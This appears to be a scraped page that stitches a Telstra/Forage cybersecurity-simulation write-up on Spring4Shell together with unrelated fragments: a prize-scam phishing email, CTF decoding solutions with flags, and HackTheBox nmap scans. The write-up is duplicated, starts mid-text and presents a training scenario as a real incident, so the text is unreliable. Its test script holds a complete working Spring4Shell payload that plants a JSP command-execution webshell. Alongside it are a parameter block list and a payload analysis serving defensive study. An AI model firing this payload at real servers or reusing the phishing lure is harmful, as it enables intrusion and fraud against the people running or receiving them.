python3 test_requests.py

This ensures that the firewall rule is correctly applied on the new port.
Task 4: Incident Postmortem and Lessons Learned
Incident Postmortem: Spring4Shell Malware Attack on NBN Connection Service

Summary
On March 20th, 2024, at 14:20 UTC, Telstra’s Security Operations Centre (SOC) detected a P1 - Critical malware attack targeting the NBN Connection service (nbn.external.network), operating on Spring Framework 5.3.0. The attack involved multiple malicious POST requests to the /tomcatwar.jsp endpoint, exploiting the Spring4Shell (CVE-2022-22965) vulnerability. The incident was identified through firewall log analysis and was successfully mitigated two hours after detection by implementing a targeted firewall rule. Key teams involved in the response included the Security Operations Centre and the NBN Team.

Impact
Service Disruption: The NBN Connection service experienced significant downtime, impairing high-speed internet connectivity for customers relying on this infrastructure.
Operational Impairment: Critical services dependent on the NBN Connection, such as remote communications and business operations, were temporarily affected.
Potential Data Exposure: Although no data breaches were confirmed, the nature of the attack posed a risk of unauthorized command execution and potential data exfiltration.
Detection
The incident was discovered through routine monitoring of firewall logs by the SOC. Analysis revealed a pattern of multiple POST requests to the /tomcatwar.jsp endpoint originating from several IP addresses within the AU region. These requests contained specific malicious payloads characteristic of the Spring4Shell vulnerability, including parameters like class.module.classLoader.resources.context.parent.pipeline.first.pattern and others designed to execute remote commands.

Root Cause
The root cause of the incident was the exploitation of the Spring4Shell (CVE-2022-22965) vulnerability within the Spring Framework 5.3.0 used by the NBN Connection service. Attackers crafted malicious POST requests to the /tomcatwar.jsp endpoint, embedding payloads that leveraged this vulnerability to execute arbitrary commands on the server, leading to service disruption and impaired functionality.

Resolution
To mitigate the attack, the SOC collaborated with the Networks Team to implement a targeted firewall rule using a Python-based HTTP server (firewall_server.py). The rule specifically blocked incoming POST requests to the /tomcatwar.jsp endpoint that contained the identified malicious parameters. This measure effectively halted the ongoing attack within two hours of its initiation, restoring the NBN Connection service to operational status and preventing further unauthorized access.
Action Items

Immediate Actions:
Firewall Rule Implementation: Successfully deployed a Python-scripted firewall rule to block malicious POST requests targeting the /tomcatwar.jsp endpoint.
Service Restoration: Coordinated with the Networks Team to ensure the NBN Connection service was promptly restored to normal operations.

Short-Term Actions:
Vulnerability Patching: Upgrade the Spring Framework to the latest version to eliminate the exploited Spring4Shell vulnerability.
Enhanced Monitoring: Increase the frequency and depth of firewall log reviews to detect similar or new attack patterns more swiftly.
Incident Documentation: Complete detailed documentation of the incident for future reference and compliance purposes.

Long-Term Actions:
Security Training: Conduct training sessions for the SOC and relevant teams on identifying and responding to similar vulnerabilities and attack vectors.
Comprehensive Security Audit: Perform a thorough security audit of all critical services to identify and remediate potential vulnerabilities.
Automation of Response Mechanisms: Develop automated scripts and tools to detect and mitigate such attacks in real-time, reducing response times.
Collaboration with Development Teams: Work closely with development teams to ensure secure coding practices are followed, particularly when using frameworks like Spring.

Future Prevention:
Regular Updates and Patching: Establish a routine schedule for updating and patching all software frameworks and dependencies to minimize vulnerability exposure.
Advanced Threat Detection Systems: Invest in more sophisticated threat detection and prevention systems that can identify and block complex attack patterns.
Incident Response Drills: Conduct regular incident response drills to ensure all teams are prepared to handle similar attacks efficiently.
Lessons Learned
Proactive Monitoring: Continuous and proactive monitoring of firewall logs is essential in the early detection of potential threats.
Collaborative Response: Effective communication and collaboration between the SOC and infrastructure teams are critical in swiftly mitigating attacks.
Automation and Scripting: Utilizing scripting languages like Python for developing automated firewall rules can significantly enhance response times and accuracy.
Regular Patching: Keeping all software frameworks and dependencies up-to-date is vital in preventing exploitation of known vulnerabilities.
Comprehensive Documentation: Maintaining detailed incident postmortems aids in future governance, risk management, and compliance efforts while educating the team on handling similar incidents.

Conclusion
This incident underscored the importance of robust monitoring, swift response mechanisms, and collaborative efforts in combating sophisticated malware attacks. By implementing targeted firewall rules and adhering to best practices in incident response, Telstra effectively mitigated the Spring4Shell attack, ensuring the continuity of its critical services and reinforcing its commitment to cybersecurity excellence.

Prepared by: Telstra Security Operations
Date: April 27, 2024
Telstra is Australia’s largest telecommunications company, offering services like mobile phones, internet, and data solutions to millions of customers nationwide. Known for its reliability and innovation, Telstra connects people and businesses, ensuring smooth and effective communication.
The Telstra Cybersecurity Job Simulation Project is a training program designed to replicate real-world cybersecurity challenges. Participants work through tasks such as detecting threats, responding to incidents, collaborating with different teams, and implementing technical solutions to protect digital systems. This simulation helps individuals build the skills needed to defend against cyber attacks and keep Telstra’s services secure.
In the dynamic realm of cybersecurity, organizations must remain vigilant and responsive to emerging threats to safeguard their infrastructure and services. This blog post presents a detailed case study of how Telstra’s Security Operations Centre (SOC) effectively responded to a Spring4Shell (CVE-2022-22965) malware attack targeting the NBN Connection service. We will walk through the entire incident response process, encompassing initial threat triage, inter-team communication, technical mitigation using Python-based firewall rules, troubleshooting, and a post-incident analysis.
Task 1: Initial Threat Triage and Notification
Incident Identification and Severity Assessment
On March 20th, 2024, at 14:20 UTC, the SOC detected unusual activity targeting the NBN Connection service (nbn.external.network), which operates on Spring Framework 5.3.0. The attack manifested through multiple malicious POST requests to the /tomcatwar.jsp endpoint, indicating an exploitation attempt of the Spring4Shell vulnerability.
Affected Infrastructure and Prioritization
An analysis of firewall logs revealed that the NBN Connection service was under direct attack. Given its critical role in providing high-speed internet connectivity, the incident was classified as P1 - Critical. Other services, including Mobile Tower Connection, Home & Business Lines, and ADSL Connect, were evaluated and found to be unaffected based on the current logs. Nonetheless, continuous monitoring was recommended to ensure comprehensive security.
Notification of the Respective Team
Prompt communication was essential to coordinate an effective response. An urgent email was drafted and sent to the NBN Team, alerting them of the ongoing attack and the necessity to initiate immediate incident response measures.
Email to NBN Team:
From: Telstra Security Operations
To: NBN Team (nbn@email)
Subject: Urgent: Malware Attack Impacting NBN Connection Service

---
Body:
Hello NBN Team,
At **14:20 on March 20, 2024**, a malware attack targeting the **NBN Connection service** running on the **Spring Framework** was detected, resulting in service disruption and impaired functionality. This incident has been assessed as **P1 - Critical** and requires the immediate initiation of incident response measures to restore services and prevent further impact.
Please review the relevant logs promptly and take the necessary mitigation actions. If you need assistance or have any questions, feel free to contact us.
Kind regards, Telstra Security Operations
This communication ensured that the NBN Team was promptly informed, enabling them to take swift action to mitigate the threat.
Task 2: Collaborating with the Networks Team to Mitigate the Attack
Analyzing Firewall Logs and Identifying Attack Patterns
Upon identifying the attack, the SOC conducted a thorough analysis of the firewall logs. The logs indicated that the attack originated from multiple IP addresses within the AU region, utilizing specific malicious payloads designed to exploit the Spring4Shell vulnerability. The attack pattern involved POST requests to the /tomcatwar.jsp endpoint with parameters like class.module.classLoader.resources.context.parent.pipeline.first.pattern and others.
Drafting an Email to the Networks Team
To address the distributed nature of the attack without blocking individual IP addresses, the SOC collaborated with the Networks Team to implement a firewall rule that filters incoming traffic based on the identified malicious request characteristics.
From: Telstra Security Operations
To: Networks Team (networks@email)
Subject: Create Firewall Rule to Mitigate Spring4Shell Attack

---
Body:
Hello Networks Team,
We would like to request the creation of a firewall rule and provide you with more information about the ongoing attack.
**Type of Attack:** Our analysis of the firewall logs indicates a Spring4Shell (CVE-2022-22965) malware attack targeting the **NBN Connection service (nbn.external.network)**. The attack involves multiple POST requests to `/tomcatwar.jsp` with malicious payloads designed to exploit the Spring Framework vulnerability.
**Characteristics to Block:**
- **Request Path:** `/tomcatwar.jsp`
- **HTTP Method:** `POST`
- **Specific Payload Patterns:** Requests containing parameters such as `class.module.classLoader.resources.context.parent.pipeline.first.pattern` and related malicious payloads.
**Request:** Please implement a firewall rule to block incoming POST requests to the `/tomcatwar.jsp` endpoint and inspect for the presence of the aforementioned malicious payload patterns in the request data. This should help mitigate the distributed nature of the attack by targeting the specific exploit characteristics rather than individual IP addresses.
**Additional Information:** The attack has been distributed across multiple IP addresses within the AU region. Blocking the specific request patterns will provide a more effective mitigation strategy. Attached is a proof of concept payload that demonstrates how the attacker scripts this attack, which may aid in refining the firewall rules.
For any questions or issues, don’t hesitate to reach out to us.
Kind regards, Telstra Security Operations
This email provided the Networks Team with the necessary details to develop targeted firewall rules, enhancing the organization’s defensive measures against the attack.
Task 3: Implementing Firewall Rules with Python
Developing a Python-Based Firewall Rule
To mitigate the attack, a Python script was developed that acts as a filtering HTTP front end: it inspects incoming POST requests to the /tomcatwar.jsp endpoint and rejects those carrying the parameter names identified in the attack, without relying on IP-based blocking, which is ineffective against a distributed source. This is a compensating control rather than a fix: it matches only the path and parameter names seen in this campaign, so the service remains vulnerable until the Spring Framework itself is patched.
```python
# firewall_server.py
# www.theforage.com - Telstra Cyber Task 3
import sys
import urllib.parse
from http.server import BaseHTTPRequestHandler, HTTPServer

host = "localhost"
port = 8000

# Form parameters characteristic of the Spring4Shell (CVE-2022-22965) payload:
# they reconfigure Tomcat's AccessLogValve to write a JSP file under the web root.
MALICIOUS_PARAMS = [
    "class.module.classLoader.resources.context.parent.pipeline.first.pattern",
    "class.module.classLoader.resources.context.parent.pipeline.first.suffix",
    "class.module.classLoader.resources.context.parent.pipeline.first.directory",
    "class.module.classLoader.resources.context.parent.pipeline.first.prefix",
    "class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat",
]


def block_request(handler):
    """Reject the request with 403 and record the offending client."""
    handler.send_response(403)
    handler.send_header("Content-Type", "text/plain")
    handler.end_headers()
    handler.wfile.write(b"Request blocked by firewall rule\n")
    print("[!] Blocked POST %s from %s" % (handler.path, handler.client_address[0]))


def allow_request(handler):
    """Let the request through (here: answer 200; a real deployment would forward it upstream)."""
    handler.send_response(200)
    handler.send_header("Content-Type", "text/plain")
    handler.end_headers()
    handler.wfile.write(b"Request allowed\n")
    print("[+] Allowed POST %s from %s" % (handler.path, handler.client_address[0]))


class ServerHandler(BaseHTTPRequestHandler):
    def do_POST(self):
        # Check if the request path is the targeted endpoint
        if self.path == "/tomcatwar.jsp":
            # Retrieve and decode the request body
            content_length = int(self.headers.get("Content-Length", 0))
            body = self.rfile.read(content_length).decode("utf-8", errors="replace")
            # keep_blank_values so an empty field such as fileDateFormat= is still seen
            params = urllib.parse.parse_qs(body, keep_blank_values=True)
            # Check for the presence of any malicious parameters
            if any(param in params for param in MALICIOUS_PARAMS):
                block_request(self)
                return
            allow_request(self)
            return
        # For all other POST requests, allow them
        allow_request(self)

    def log_message(self, format, *args):
        # Override to suppress default logging
        return


if __name__ == "__main__":
    server = HTTPServer((host, port), ServerHandler)
    print("[+] Firewall Server")
    print("[+] HTTP Web Server running on: %s:%s" % (host, port))
    try:
        server.serve_forever()
    except KeyboardInterrupt:
        print("\n[!] Keyboard interrupt received")
    server.server_close()
    print("[+] Server terminated. Exiting...")
    sys.exit(0)
```
Testing the Firewall Rule
A complementary script, test_requests.py, sends the Spring4Shell payload to the firewall server five times. With the rule active every request should be rejected, so the expected result is 0/5 "successful" responses; a benign POST, which the rule must let through with a 200, can be added to the loop the same way.
```python
# Test Requester.py
# www.theforage.com - Telstra Cyber Task 3
# Test Requester

import http.client

host = "localhost"
port = 8000


def main():
    target = f"{host}:{port}"
    print(f"[+] Beginning test requests to: {target}")
    successful_responses = 0

    for x in range(5):
        # URL-encoded Spring4Shell payload: five AccessLogValve properties set through data binding
        payload = (
            "class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if("
            "%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di."
            "getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20"
            "%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%"
            "7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module."
            "classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader."
            "resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent."
            "pipeline.first.fileDateFormat="
        )
        # Header values referenced by the %{c1}i / %{c2}i / %{suffix}i placeholders in the pattern
        headers = {
            "Content-Type": "application/x-www-form-urlencoded",
            "suffix": "%>//",
            "c1": "Runtime",
            "c2": "<%",
        }
        print(f"[{x + 1}/5]: Making test request to {target} with payload: {payload}")
        conn = http.client.HTTPConnection(host, port)
        conn.request("POST", "/tomcatwar.jsp", body=payload, headers=headers)
        response = conn.getresponse()
        response.read()
        print(f"[+] Response: {response.status} {response.reason}")
        if response.status == 200:
            successful_responses += 1
        conn.close()

    print("[+] Test completed.")
    print(f"[+] Successful responses: {successful_responses}/5")


if __name__ == "__main__":
    main()
```
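As an added example (not part of the Forage task or of the scripts above), the following Python takes the payload body from test_requests.py apart to show what the request actually does: which AccessLogValve properties it sets through Spring's data binding, where Tomcat would write the resulting file, and how the `%{c1}i` and `%{c2}i` header placeholders turn an access-log line into JSP source. The header values `c1: Runtime` and `c2: <%` used to render it are the ones the placeholders imply and are an assumption here; the detection helper also checks the older `class.classLoader` binding path, which the page does not mention.

```python
import re
import urllib.parse

# Property path used by the JDK 9+ variant of CVE-2022-22965 to reach Tomcat's AccessLogValve
# through Spring data binding (the older class.classLoader path has been blocked since CVE-2010-1622)
VALVE_PREFIX = "class.module.classLoader.resources.context.parent.pipeline.first."
BINDING_PATHS = ("class.module.classLoader.", "class.classLoader.")

# Request body sent by test_requests.py above (URL-encoded form data)
PAYLOAD = (
    "class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if("
    "%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di."
    "getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20"
    "%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%"
    "7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module."
    "classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader."
    "resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent."
    "pipeline.first.fileDateFormat="
)


def is_spring4shell_body(body: str) -> bool:
    """True if any form field walks into the class loader via a known binding path."""
    params = urllib.parse.parse_qs(body, keep_blank_values=True)
    return any(name.startswith(BINDING_PATHS) for name in params)


def valve_fields(body: str) -> dict:
    """Extract the AccessLogValve properties the payload sets, keyed by short name.

    keep_blank_values matters: fileDateFormat= is empty and parse_qs drops it otherwise.
    """
    params = urllib.parse.parse_qs(body, keep_blank_values=True)
    return {name[len(VALVE_PREFIX):]: values[0]
            for name, values in params.items() if name.startswith(VALVE_PREFIX)}


def webshell_path(fields: dict) -> str:
    """Where the valve writes its 'log': directory/prefix + fileDateFormat + suffix,
    relative to Tomcat's working directory."""
    return f"{fields['directory']}/{fields['prefix']}{fields.get('fileDateFormat', '')}{fields['suffix']}"


def render_access_log_pattern(pattern: str, headers: dict) -> str:
    """Expand %{name}i (request header) tokens the way the access log does; the attacker
    controls those headers, so the logged line becomes JSP source."""
    return re.sub(r"%\{([^}]+)\}i", lambda m: headers.get(m.group(1), ""), pattern)


if __name__ == "__main__":
    fields = valve_fields(PAYLOAD)
    print("malicious:", is_spring4shell_body(PAYLOAD))
    print("webshell written to:", webshell_path(fields))
    # Assumed header values; the page's payload only references them by name
    print(render_access_log_pattern(fields["pattern"], {"c1": "Runtime", "c2": "<%", "suffix": "%>//"}))
```

The rendered output shows why a rule has to key on parameter names rather than values: the JSP body is assembled from headers plus the pattern, so any single value is trivial for an attacker to vary, while the `class.module.classLoader` path is what the exploit cannot do without.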
Troubleshooting: Addressing Port Conflicts
During the deployment of the firewall_server.py script, an error was encountered:
```
OSError: [Errno 48] Address already in use
```
This indicated that port 8000 was occupied by another process, preventing the firewall server from binding to it. The following steps were undertaken to resolve the issue:
Identifying the Occupying Process:
Using the lsof command:
```
lsof -i :8000
```
This command revealed the Process ID (PID) of the application using port 8000.
Terminating the Conflicting Process:
The identified process was terminated with the kill command. Try a plain `kill <PID>` first, which sends SIGTERM and lets the process shut down cleanly; fall back to -9 (SIGKILL) only if it does not exit:

```
kill -9 <PID>
```

Replace <PID> with the actual Process ID obtained from the previous step.
Verifying Port Availability:
Ensuring that port 8000 was free by rerunning the lsof command:
```
lsof -i :8000
```
No output indicates that the port is now free.
Restarting the Firewall Server:
After freeing up the port, the firewall_server.py script was successfully executed:
```
python3 firewall_server.py
```
The server started without issues, indicating that it was listening on the designated port.
Alternative Solution: Changing the Server Port
If port 8000 remains consistently in use, an alternative approach involves changing the server to listen on a different port (e.g., 8080). This requires updating both the firewall_server.py and test_requests.py scripts to reflect the new port number.
Edit firewall_server.py:
Modify the port variable:
```
host = "localhost"
port = 8080
```
Edit test_requests.py:
Update the port number accordingly:
```
host = "localhost"
port = 8080
```
Run the Modified Server:
```
python3 firewall_server.py
```
Run the Test Requester:
```
python3 test_requests.py
```
This ensures that the firewall rule is correctly applied on the new port.
Task 4: Incident Postmortem and Lessons Learned
Incident Postmortem: Spring4Shell Malware Attack on NBN Connection Service
Summary
On March 20th, 2024, at 14:20 UTC, Telstra’s Security Operations Centre (SOC) detected a P1 - Critical attack targeting the NBN Connection service (nbn.external.network), operating on Spring Framework 5.3.0. The attack involved multiple malicious POST requests to the /tomcatwar.jsp endpoint, exploiting the Spring4Shell (CVE-2022-22965) vulnerability. The incident was identified through firewall log analysis and was mitigated two hours after detection by implementing a targeted firewall rule. Key teams involved in the response were the Security Operations Centre, the NBN Team and the Networks Team.
Impact
Service Disruption: The NBN Connection service experienced significant downtime, impairing high-speed internet connectivity for customers relying on this infrastructure.
Operational Impairment: Critical services dependent on the NBN Connection, such as remote communications and business operations, were temporarily affected.
Potential Data Exposure: Although no data breaches were confirmed, the nature of the attack posed a risk of unauthorized command execution and potential data exfiltration.
Detection
The incident was discovered through routine monitoring of firewall logs by the SOC. Analysis revealed a pattern of multiple POST requests to the /tomcatwar.jsp endpoint originating from several IP addresses within the AU region. These requests contained specific malicious payloads characteristic of the Spring4Shell vulnerability, including parameters like class.module.classLoader.resources.context.parent.pipeline.first.pattern and others designed to execute remote commands.
Root Cause
The root cause of the incident was an unpatched Spring Framework 5.3.0 behind the NBN Connection service. Spring4Shell (CVE-2022-22965) lets a request bind form parameters through the class.module.classLoader property path into Tomcat's AccessLogValve when the application runs as a WAR on Tomcat under JDK 9 or later. The attackers' POST requests to the /tomcatwar.jsp endpoint set the valve's pattern, directory, prefix and suffix so that Tomcat wrote a JSP webshell into the web root, giving them arbitrary command execution on the server and causing the observed service disruption.
Resolution
To mitigate the attack, the SOC collaborated with the Networks Team to implement a targeted firewall rule using a Python-based HTTP server (firewall_server.py). The rule blocked incoming POST requests to the /tomcatwar.jsp endpoint that contained the identified malicious parameters. This halted the ongoing attack within two hours of detection and allowed the NBN Connection service to return to operational status. The rule matches only the request path and parameter names observed in this attack, so it is a compensating control rather than a fix; the underlying vulnerability remains until the framework is patched.
Action Items
Immediate Actions:
Firewall Rule Implementation: Successfully deployed a Python-scripted firewall rule to block malicious POST requests targeting the /tomcatwar.jsp endpoint.
Service Restoration: Coordinated with the Networks Team to ensure the NBN Connection service was promptly restored to normal operations.
Short-Term Actions:
Vulnerability Patching: Upgrade the Spring Framework to a patched release (5.3.18 or later, or 5.2.20 for the 5.2 line) to eliminate the exploited Spring4Shell vulnerability, and verify the deployed version afterwards.
Enhanced Monitoring: Increase the frequency and depth of firewall log reviews to detect similar or new attack patterns more swiftly.
Incident Documentation: Complete detailed documentation of the incident for future reference and compliance purposes.
Long-Term Actions:
Security Training: Conduct training sessions for the SOC and relevant teams on identifying and responding to similar vulnerabilities and attack vectors.
Comprehensive Security Audit: Perform a thorough security audit of all critical services to identify and remediate potential vulnerabilities.
Automation of Response Mechanisms: Develop automated scripts and tools to detect and mitigate such attacks in real-time, reducing response times.
Collaboration with Development Teams: Work closely with development teams to ensure secure coding practices are followed, particularly when using frameworks like Spring.
Future Prevention:
Regular Updates and Patching: Establish a routine schedule for updating and patching all software frameworks and dependencies to minimize vulnerability exposure.
Advanced Threat Detection Systems: Invest in more sophisticated threat detection and prevention systems that can identify and block complex attack patterns.
Incident Response Drills: Conduct regular incident response drills to ensure all teams are prepared to handle similar attacks efficiently.
Lessons Learned
Proactive Monitoring: Continuous and proactive monitoring of firewall logs is essential in the early detection of potential threats.
Collaborative Response: Effective communication and collaboration between the SOC and infrastructure teams are critical in swiftly mitigating attacks.
Automation and Scripting: Utilizing scripting languages like Python for developing automated firewall rules can significantly enhance response times and accuracy.
Regular Patching: Keeping all software frameworks and dependencies up-to-date is vital in preventing exploitation of known vulnerabilities.
Comprehensive Documentation: Maintaining detailed incident postmortems aids in future governance, risk management, and compliance efforts while educating the team on handling similar incidents.
Conclusion
This incident underscored the importance of robust monitoring, swift response mechanisms, and collaborative efforts in combating sophisticated malware attacks. By implementing targeted firewall rules and adhering to best practices in incident response, Telstra effectively mitigated the Spring4Shell attack, ensuring the continuity of its critical services and reinforcing its commitment to cybersecurity excellence.
Prepared by: Telstra Security Operations
Date: April 27, 2024
```
Hello dear user, I am Larry Page and I am delighted to announce to you that=
 you are the 99999999th GMAIL account and for that we want to reward you. =
You've earned $1,000,000. To claim your prize open the attached file.
----_NmP-426c22a2e0d8fc9a-Part_2
Content-Type: text/html; charset=utf-8
Content-Transfer-Encoding: quoted-printable

<p>Hello dear user, I am Larry Page and I am delighted to announce to you =
that you are the 99999999th GMAIL account and for that we want to reward =
you. You've earned $1,000,000. To claim your prize open the attached file.=
<br></p>
----_NmP-426c22a2e0d8fc9a-Part_2--
```
```bash
#!/usr/bin/env bash
# Extract nested ZIP files in a loop: each archive contains the next one.
# Usage: ./unzip_nested.sh <first-archive.zip>
set -u

filename="${1:?usage: $0 <first-archive.zip>}"

while [ -f "$filename" ]; do
    # Extract everything in the current ZIP file
    unzip -o -q "$filename"
    # Delete the archive just processed; otherwise the find below returns it again and the loop never ends
    rm -f "$filename"
    # Find the next ZIP file
    next_zip=$(find . -name "*.zip" | head -n 1)
    # If a new ZIP file was found, continue with it; otherwise stop
    if [ -n "$next_zip" ]; then
        filename="$next_zip"
    else
        echo "Extraction complete or no more ZIP files found."
        break
    fi
done
```
```
~/Desktop/testtest/ hexdump -C message.txt
00000000  ff fe 68 00 fe ff 00 65  ff fe 32 00 fe ff 00 30  |..h....e..2....0|
00000010  ff fe 32 00 fe ff 00 33  ff fe 7b 00 fe ff 00 75  |..2....3..{....u|
00000020  ff fe 37 00 fe ff 01 92  ff fe 5f 00 fe ff 00 62  |..7......._....b|
00000030  ff fe 30 00 fe ff 00 6d  ff fe 35 00 fe ff 00 73  |..0....m..5....s|
00000040  ff fe 5f 00 fe ff 00 38  ff fe 72 00 fe ff 15 f1  |.._....8..r.....|
00000050  ff fe 5f 00 fe ff 00 6e  ff fe 30 00 fe ff 00 37  |.._....n..0....7|
00000060  ff fe 5f 00 fe ff 00 38  ff fe 63 31 fe ff 00 77  |.._....8..c1...w|
00000070  ff fe 61 00 fe ff 00 79  ff fe 35 00 fe ff 00 5f  |..a....y..5...._|
00000080  ff fe 31 00 fe ff 00 67  ff fe 6e 00 fe ff 00 30  |..1....g..n....0|
00000090  ff fe 72 00 fe ff 15 f1  ff fe 64 00 fe ff 00 7d  |..r.......d....}|
000000a0
```
Extracted flag:

```
he2023{u7_b0m5s_8r_n07_8c1way5_1gn0rd}
```
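The alternating `ff fe` / `fe ff` pairs in the dump are UTF-16 byte-order marks placed before every code unit, flipping the byte order each time. A plain `.decode("utf-16")` honours only the first BOM and turns the rest into noise, which is the trick the challenge relies on. The decoder below is an added example, not the author's solution: it carries the bytes from the hexdump above and treats every BOM as a byte-order switch instead of a character. Decoded this way the message also contains three non-ASCII code units (U+0192, U+15F1 and U+3163) that the ASCII column of hexdump shows as dots or, for `63 31`, as the misleading pair `c1`.

```python
BOM_LE = b"\xff\xfe"
BOM_BE = b"\xfe\xff"

# Bytes from the hexdump above: one BOM before every UTF-16 code unit
MESSAGE_BYTES = bytes.fromhex(
    "fffe6800feff0065fffe3200feff0030"
    "fffe3200feff0033fffe7b00feff0075"
    "fffe3700feff0192fffe5f00feff0062"
    "fffe3000feff006dfffe3500feff0073"
    "fffe5f00feff0038fffe7200feff15f1"
    "fffe5f00feff006efffe3000feff0037"
    "fffe5f00feff0038fffe6331feff0077"
    "fffe6100feff0079fffe3500feff005f"
    "fffe3100feff0067fffe6e00feff0030"
    "fffe7200feff15f1fffe6400feff007d"
)


def decode_bom_bomb(data: bytes, default_order: str = "little") -> str:
    """Decode UTF-16 text in which byte-order marks may appear anywhere.

    Every BOM switches the byte order for the units that follow it and is itself
    dropped, instead of being decoded as U+FEFF/U+FFFE. Only BMP code units are
    handled (no surrogate-pair joining), which is all this message needs.
    """
    order = default_order
    out = []
    for i in range(0, len(data) - 1, 2):
        unit = data[i:i + 2]
        if unit == BOM_LE:
            order = "little"
        elif unit == BOM_BE:
            order = "big"
        else:
            out.append(chr(int.from_bytes(unit, order)))
    return "".join(out)


def naive_utf16_decode(data: bytes) -> str:
    """What a plain decode does: it honours only the leading BOM, so later BOMs and
    opposite-endian units come out as garbage."""
    return data.decode("utf-16", errors="replace")


def count_boms(data: bytes) -> int:
    """Number of BOM code units in the data (40 here: one per character)."""
    return sum(1 for i in range(0, len(data) - 1, 2) if data[i:i + 2] in (BOM_LE, BOM_BE))


if __name__ == "__main__":
    print("naive :", naive_utf16_decode(MESSAGE_BYTES))
    print("bombed:", decode_bom_bomb(MESSAGE_BYTES))
```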
Rotational
Challenge:

```
96a_abL_?b04c?0Cbc50C_E_C03c4<HcC5DN
```

The task is to decrypt this text into the flag. Initial attempts with common rotation ciphers such as ROT13 failed; the hint "the rotor must have been too fast!" suggests a larger rotation than the usual one.
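The hint points at the rotor, that is the shift, being larger than the usual 13, and ROT13 only touches letters while the ciphertext is full of digits and punctuation. The page does not show the author's solution; the code below is an added example that generalises the rotation to the 94 printable ASCII characters (the alphabet of ROT47) and tries every shift, keeping the candidates that start with the flag prefix `he2023{`, which is taken from the previous challenge on this page and assumed to apply here as well.

```python
import string

# The 94 visible ASCII characters, '!' (0x21) to '~' (0x7e): the ROT47 alphabet
PRINTABLE = "".join(chr(c) for c in range(33, 127))

# Ciphertext from the challenge above
CIPHER = "96a_abL_?b04c?0Cbc50C_E_C03c4<HcC5DN"


def rotate(text: str, shift: int, alphabet: str = PRINTABLE) -> str:
    """Shift every character of `alphabet` by `shift` positions (mod its length);
    characters outside the alphabet pass through unchanged."""
    n = len(alphabet)
    index = {ch: i for i, ch in enumerate(alphabet)}
    return "".join(alphabet[(index[ch] + shift) % n] if ch in index else ch for ch in text)


def rot_letters(text: str, shift: int = 13) -> str:
    """Classic ROT-N over letters only, both cases (ROT13 by default), for comparison."""
    return rotate(rotate(text, shift, string.ascii_lowercase), shift, string.ascii_uppercase)


def brute_force(cipher: str, known_prefix: str, alphabet: str = PRINTABLE):
    """Try every non-zero shift over `alphabet` and return (shift, plaintext) for the
    candidates that start with the known flag prefix. Each shift is a bijection, so at
    most one shift can map the first ciphertext character onto the prefix's first one."""
    hits = []
    for shift in range(1, len(alphabet)):
        plain = rotate(cipher, shift, alphabet)
        if plain.startswith(known_prefix):
            hits.append((shift, plain))
    return hits


if __name__ == "__main__":
    print("ROT13 over letters:", rot_letters(CIPHER))
    for shift, plain in brute_force(CIPHER, "he2023{"):
        print(f"shift {shift}: {plain}")
```

With shift 47 the ciphertext decodes to `he2023{0n3_c4n_r34d_r0t0r_b4ckw4rds}`; because 47 is half of 94, ROT47 is its own inverse, just as ROT13 is over the 26 letters.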
```
┌──(root@kali)-[/home/h4m5t/Desktop/HTB/Invalidated]
└─# nmap -sC -sV $(cat ip.txt)
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-30 23:26 AEST
Nmap scan report for invalidated.htb (10.129.233.58)
Host is up (0.015s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 3e:ea:45:4b:c5:d1:6d:6f:e2:d4:d1:3b:0a:3d:a9:4f (ECDSA)
|_  256 64:cc:75:de:4a:e6:a5:b4:73:eb:3f:1b:cf:b4:e3:94 (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-title: Sign up
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.09 seconds
```
```
┌──(root@kali)-[/home/h4m5t/Desktop/HTB/Rental]
└─# nmap -sC -sV $(cat ip.txt)
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-29 19:58 AEST
Nmap scan report for 10.129.96.12
Host is up (0.010s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
|   256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_  256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
|_http-title: Mixt
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

